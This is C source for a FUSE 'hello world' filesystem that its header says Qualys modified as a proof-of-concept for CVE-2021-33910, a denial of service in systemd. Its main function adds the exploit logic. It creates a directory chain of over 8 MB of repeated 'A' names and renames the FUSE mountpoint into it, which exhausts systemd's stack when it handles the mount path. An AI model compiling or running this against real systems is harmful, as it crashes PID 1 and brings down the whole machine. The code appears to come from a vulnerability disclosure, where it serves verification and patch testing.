/* FUSE: Filesystem in Userspace Copyright (C) 2001-2007 Miklos Szeredi Modified by Qualys for: CVE-2021-33910: Denial of service (stack exhaustion) in systemd (PID 1) This program can be distributed under the terms of the GNU GPL. See the file COPYING. gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello */ #define FUSE_USE_VERSION 26 #include #include #include #include #include #include #include #include #include #include static const char *hello_str = "Hello World!\n"; static const char *hello_path = "/hello"; static int hello_getattr(const char *path, struct stat *stbuf) { int res = 0; memset(stbuf, 0, sizeof(struct stat)); if (strcmp(path, "/") == 0) { stbuf->st_mode = S_IFDIR | 0755; stbuf->st_nlink = 2; } else if (strcmp(path, hello_path) == 0) { stbuf->st_mode = S_IFREG | 0444; stbuf->st_nlink = 1; stbuf->st_size = strlen(hello_str); } else res = -ENOENT; return res; } static int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler, off_t offset, struct fuse_file_info *fi) { (void) offset; (void) fi; if (strcmp(path, "/") != 0) return -ENOENT; filler(buf, ".", NULL, 0); filler(buf, "..", NULL, 0); filler(buf, hello_path + 1, NULL, 0); return 0; } static int hello_open(const char *path, struct fuse_file_info *fi) { if (strcmp(path, hello_path) != 0) return -ENOENT; if ((fi->flags & 3) != O_RDONLY) return -EACCES; return 0; } static int hello_read(const char *path, char *buf, size_t size, off_t offset, struct fuse_file_info *fi) { size_t len; (void) fi; if (strcmp(path, hello_path) != 0) return -ENOENT; len = strlen(hello_str); if (offset < len) { if (offset + size > len) size = len - offset; memcpy(buf, hello_str + offset, size); } else size = 0; return size; } static struct fuse_operations hello_oper = { .getattr = hello_getattr, .readdir = hello_readdir, .open = hello_open, .read = hello_read, }; int main(int argc, char *argv[]) { if (argc != 2) { if (argc != 3) exit(__LINE__); char * const mpoint = argv[1]; if (chdir(argv[2])) exit(__LINE__); static char onedir[NAME_MAX + 1]; memset(onedir, 'A', sizeof(onedir)-1); size_t i; puts("creating directories, please wait..."); for (i = 0; i <= (1 << 23) / sizeof(onedir); i++) { if (mkdir(onedir, S_IRWXU)) exit(__LINE__); if (chdir(onedir)) exit(__LINE__); } char * const rslash = strrchr(mpoint, '/'); if (!rslash) exit(__LINE__); *rslash = '\0'; if (rename(mpoint, "./A")) exit(__LINE__); exit(EXIT_SUCCESS); } return fuse_main(argc, argv, &hello_oper, NULL); }